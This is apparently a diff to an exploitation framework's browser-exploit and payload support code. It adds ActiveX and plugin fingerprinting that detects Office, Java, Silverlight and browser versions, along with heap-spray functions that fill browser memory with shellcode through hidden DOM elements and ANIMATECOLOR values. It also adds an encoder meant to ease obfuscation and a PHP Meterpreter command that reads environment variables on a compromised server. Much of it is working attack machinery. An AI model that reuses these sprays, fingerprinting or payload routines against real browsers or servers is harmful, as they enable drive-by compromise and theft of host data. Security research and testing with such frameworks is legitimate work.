+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+window.ie_addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}
@@ -0,0 +1,110 @@
+window.misc_addons_detect = { };
+
+
+/**
+ * Detects whether the browser supports Silverlight or not
+ **/
+window.misc_addons_detect.hasSilverlight = function () {
+	var found = false;
+
+	//
+	// When on IE, we can use AgControl.AgControl to actually detect the version too.
+	// But this ability is specific to IE, so we fall back to just true/false response
+	//
+	try {
+		var ax = new ActiveXObject('AgControl.AgControl');
+		found = true;
+	} catch(e) {}
+
+	//
+	// ActiveX didn't get anything, try looking in MIMEs
+	//
+	if (!found) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i < mimes.length; i++) {
+			if (/x\-silverlight/.test(mimes[i].type)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	//
+	// MIMEs didn't work either. Try navigator.
+	//
+	if (!found) {
+		var count = navigator.plugins.length;
+		for (var i=0; i < count; i++) {
+			var pluginName = navigator.plugins[i].name;
+			if (/Silverlight Plug\-In/.test(pluginName)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	return found;
+}
+
+/**
+ * Returns the Java version
+ **/
+window.misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
@@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
 		return d.style[propCamelCase] === css;
 	}

+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
 	//--
 	// Client
 	//--
@@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if ('HTMLTimeElement' in window) {
-			ua_version = '22.0'
+		if (css_is_valid('background-attachment',
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
 		} else if ('createElement' in document &&
 		           document.createElement('main') &&
 		           document.createElement('main').constructor === window['HTMLElement']) {
-			ua_version = '21.0'
+			ua_version = '21.0';
 		} else if ('imul' in Math) {
-			ua_version = '20.0'
+			ua_version = '20.0';
 		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
-			ua_version = '19.0'
+			ua_version = '19.0';
 		} else if ('devicePixelRatio' in window) {
-			ua_version = '18.0'
+			ua_version = '18.0';
 		} else if ('createElement' in document &&
 		           document.createElement('iframe') &&
 		           'sandbox' in document.createElement('iframe')) {
-			ua_version = '17.0'
+			ua_version = '17.0';
 		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
-			ua_version = '16.0'
+			ua_version = '16.0';
 		} else if ('HTMLSourceElement' in window && 
 		           HTMLSourceElement.prototype &&
 		           'media' in HTMLSourceElement.prototype) {
-			ua_version = '15.0'
+			ua_version = '15.0';
 		} else if ('mozRequestPointerLock' in document.body) {
-			ua_version = '14.0'
+			ua_version = '14.0';
 		} else if ('Map' in window) {
-			ua_version = "13.0"
+			ua_version = "13.0";
 		} else if ('mozConnection' in navigator) {
 			ua_version = "12.0";
 		} else if ('mozVibrate' in navigator) {
@@ -850,6 +867,12 @@ window.os_detect.getVersion = function(){
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
 			case "1000":
 				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
 				ua_version = "10.0";
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}
@@ -0,0 +1,18 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, false);
+  xmlHttp.send(oArg.data);
+  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+    return xmlHttp.responseText;
+  }
+  return null;
+}
@@ -0,0 +1,10 @@
+function postInfo(path, data) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, false);
+  xmlHttp.send(data);
+}
@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};
@@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA",          TLV_META_TYPE_RAW     | 1012);
 define("TLV_TYPE_COMPUTER_NAME",       TLV_META_TYPE_STRING  | 1040);
 define("TLV_TYPE_OS_NAME",             TLV_META_TYPE_STRING  | 1041);
 define("TLV_TYPE_USER_NAME",           TLV_META_TYPE_STRING  | 1042);
+define("TLV_TYPE_ARCHITECTURE",        TLV_META_TYPE_STRING  | 1043);
+define("TLV_TYPE_LANG_SYSTEM",         TLV_META_TYPE_STRING  | 1044);
+
+# Environment
+define("TLV_TYPE_ENV_VARIABLE",        TLV_META_TYPE_STRING  | 1100);
+define("TLV_TYPE_ENV_VALUE",           TLV_META_TYPE_STRING  | 1101);
+define("TLV_TYPE_ENV_GROUP",           TLV_META_TYPE_GROUP   | 1102);
+

 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));

@@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
 # eval'd twice
 my_print("Evaling stdapi");

-## 
+##
 # Search Helpers
 ##

@@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
 */
 if (!function_exists('safe_glob')) {
 function safe_glob($pattern, $flags=0) {
-	$split=explode('/',str_replace('\\','/',$pattern));
-	$mask=array_pop($split);
-	$path=implode('/',$split);
-	if (($dir=opendir($path))!==false) {
-		$glob=array();
-		while (($file=readdir($dir))!==false) {
-			// Recurse subdirectories (GLOB_RECURSE)
-			if ( 
-				(
-				 $flags&GLOB_RECURSE) && is_dir($path."/".$file) 
-   				 && (!in_array($file,array('.','..'))
-				 # don't follow links to avoid infinite recursion
-				 && (!is_link($path."/".$file))
-				)
-   			) {
-				$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
-							($flags&GLOB_PATH?'':$file.'/')));
+    $split=explode('/',str_replace('\\','/',$pattern));
+    $mask=array_pop($split);
+    $path=implode('/',$split);
+    if (($dir=opendir($path))!==false) {
+        $glob=array();
+        while (($file=readdir($dir))!==false) {
+            // Recurse subdirectories (GLOB_RECURSE)
+            if (
+                (
+                    $flags&GLOB_RECURSE) && is_dir($path."/".$file)
+                    && (!in_array($file,array('.','..'))
+                    # don't follow links to avoid infinite recursion
+                    && (!is_link($path."/".$file))
+                )
+            ) {
+                $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
+                    ($flags&GLOB_PATH?'':$file.'/')));
            }
-			// Match file mask
-			if (fnmatch($mask,$file)) {
-				if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
-						&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
-						&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
-					$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
-			}
-		}
-		closedir($dir);
-		if (!($flags&GLOB_NOSORT)) sort($glob);
-		return $glob;
-	} else {
-		return false;
-	}   
+            // Match file mask
+            if (fnmatch($mask,$file)) {
+                if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
+                    && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
+                    && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
+                    $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
+            }
+        }
+        closedir($dir);
+        if (!($flags&GLOB_NOSORT)) sort($glob);
+        return $glob;
+    } else {
+        return false;
+    }
 }
 }
 /**
@@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
 */
 if (!function_exists('fnmatch')) {
 function fnmatch($pattern, $string) {
-	return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
+    return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
 }
 }

@@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
        else
            $array[$key] = $string.$element;
    return $array;
-   
+
 }
 }

@@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
    $path = cononicalize_path($path_tlv['value']);

-		if (is_callable("md5_file")) {
-			$md5 = md5_file($path);
-		} else {
-			$md5 = md5(file_get_contents($path));
-		}
-		$md5 = pack("H*", $md5);
-		# Ghetto abuse of file name type to indicate the md5 result
+    if (is_callable("md5_file")) {
+        $md5 = md5_file($path);
+    } else {
+        $md5 = md5(file_get_contents($path));
+    }
+    $md5 = pack("H*", $md5);
+    # Ghetto abuse of file name type to indicate the md5 result
    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
    return ERROR_SUCCESS;
 }
@@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
    $path = cononicalize_path($path_tlv['value']);

-		if (is_callable("sha1_file")) {
-			$sha1 = sha1_file($path);
-		} else {
-			$sha1 = sha1(file_get_contents($path));
-		}
-		$sha1 = pack("H*", $sha1);
-		# Ghetto abuse of file name type to indicate the sha1 result
+    if (is_callable("sha1_file")) {
+        $sha1 = sha1_file($path);
+    } else {
+        $sha1 = sha1(file_get_contents($path));
+    }
+    $sha1 = pack("H*", $sha1);
+    # Ghetto abuse of file name type to indicate the sha1 result
    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
    return ERROR_SUCCESS;
 }
@@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
 }
 }

+if (!function_exists('stdapi_sys_config_getenv')) {
+register_command('stdapi_sys_config_getenv');
+function stdapi_sys_config_getenv($req, &$pkt) {
+    my_print("doing getenv");
+
+    $variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
+
+    # If we decide some day to have sys.config.getenv return all env
+    # vars when given an empty search list, this is one way to do it.
+    #if (empty($variable_tlvs)) {
+    #    # We don't have a var to look up, return all of 'em
+    #    $variables = array_keys($_SERVER);
+    #} else {
+    #    $variables = array();
+    #    foreach ($variable_tlvs as $tlv) {
+    #        array_push($variables, $tlv['value']);
+    #    }
+    #}
+
+    foreach ($variable_tlvs as $name) {
+        $canonical_name = str_replace(array("$","%"), "", $name['value']);
+        $env = getenv($canonical_name);
+        if ($env !== FALSE) {
+            $grp = "";
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
+            packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
+        }
+    }
+
+    return ERROR_SUCCESS;
+}
+}
+
+
 # Unimplemented becuase it's unimplementable
 #if (!function_exists('stdapi_sys_config_rev2self')) {
 #register_command('stdapi_sys_config_rev2self');
@@ -696,24 +739,24 @@ function close_process($proc) {
        foreach ($proc['pipes'] as $f) {
            @fclose($f);
        }
-		if (is_callable('proc_get_status')) {
-			$status = proc_get_status($proc['handle']);
-		} else {
-			# fake a running process on php < 4.3
-			$status = array('running' => true);
-		}
+        if (is_callable('proc_get_status')) {
+            $status = proc_get_status($proc['handle']);
+        } else {
+            # fake a running process on php < 4.3
+            $status = array('running' => true);
+        }

-		# proc_close blocks waiting for the child to exit, so if it's still
-		# running, don't take a chance on deadlock and just sigkill it if we
-		# can.  We can't on php < 4.3, so don't do anything.  This will leave
-		# zombie processes, but that's better than deadlock.
-		if ($status['running'] == false) {
-			proc_close($proc['handle']);
-		} else {
-			if (is_callable('proc_terminate')) {
-				proc_terminate($proc['handle'], 9);
-			}
-		}
+        # proc_close blocks waiting for the child to exit, so if it's still
+        # running, don't take a chance on deadlock and just sigkill it if we
+        # can.  We can't on php < 4.3, so don't do anything.  This will leave
+        # zombie processes, but that's better than deadlock.
+        if ($status['running'] == false) {
+            proc_close($proc['handle']);
+        } else {
+            if (is_callable('proc_terminate')) {
+                proc_terminate($proc['handle'], 9);
+            }
+        }
        if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
            unset($channel_process_map[$proc['cid']]);
        }
@@ -86,170 +86,185 @@ TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
-TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
-TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
-TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
+TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
+TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
+TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4

-TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
-TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
-TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+TLV_TYPE_STRING                = TLV_META_TYPE_STRING  | 10
+TLV_TYPE_UINT                  = TLV_META_TYPE_UINT    | 11
+TLV_TYPE_BOOL                  = TLV_META_TYPE_BOOL    | 12

-TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
-TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
-TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+TLV_TYPE_LENGTH                = TLV_META_TYPE_UINT    | 25
+TLV_TYPE_DATA                  = TLV_META_TYPE_RAW     | 26
+TLV_TYPE_FLAGS                 = TLV_META_TYPE_UINT    | 27

-TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
-TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
-TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
-TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
-TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_ID            = TLV_META_TYPE_UINT    | 50
+TLV_TYPE_CHANNEL_TYPE          = TLV_META_TYPE_STRING  | 51
+TLV_TYPE_CHANNEL_DATA          = TLV_META_TYPE_RAW     | 52
+TLV_TYPE_CHANNEL_DATA_GROUP    = TLV_META_TYPE_GROUP   | 53
+TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54

 ##
 # General
 ##
-TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
-TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
-TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
-TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
+TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631

 ##
 # Fs
 ##
-TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
-TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
-TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
-TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
-TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_DIRECTORY_PATH        = TLV_META_TYPE_STRING  | 1200
+TLV_TYPE_FILE_NAME             = TLV_META_TYPE_STRING  | 1201
+TLV_TYPE_FILE_PATH             = TLV_META_TYPE_STRING  | 1202
+TLV_TYPE_FILE_MODE             = TLV_META_TYPE_STRING  | 1203
+TLV_TYPE_FILE_SIZE             = TLV_META_TYPE_UINT    | 1204

-TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
+TLV_TYPE_STAT_BUF              = TLV_META_TYPE_COMPLEX | 1220

-TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
-TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
-TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
-TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
+TLV_TYPE_SEARCH_RECURSE        = TLV_META_TYPE_BOOL    | 1230
+TLV_TYPE_SEARCH_GLOB           = TLV_META_TYPE_STRING  | 1231
+TLV_TYPE_SEARCH_ROOT           = TLV_META_TYPE_STRING  | 1232
+TLV_TYPE_SEARCH_RESULTS        = TLV_META_TYPE_GROUP   | 1233

 ##
 # Net
 ##
-TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
-TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
+TLV_TYPE_HOST_NAME             = TLV_META_TYPE_STRING  | 1400
+TLV_TYPE_PORT                  = TLV_META_TYPE_UINT    | 1401

-TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
-TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
-TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
-TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
+TLV_TYPE_SUBNET                = TLV_META_TYPE_RAW     | 1420
+TLV_TYPE_NETMASK               = TLV_META_TYPE_RAW     | 1421
+TLV_TYPE_GATEWAY               = TLV_META_TYPE_RAW     | 1422
+TLV_TYPE_NETWORK_ROUTE         = TLV_META_TYPE_GROUP   | 1423

-TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
-TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
-TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
-TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
+TLV_TYPE_IP                    = TLV_META_TYPE_RAW     | 1430
+TLV_TYPE_MAC_ADDRESS           = TLV_META_TYPE_RAW     | 1431
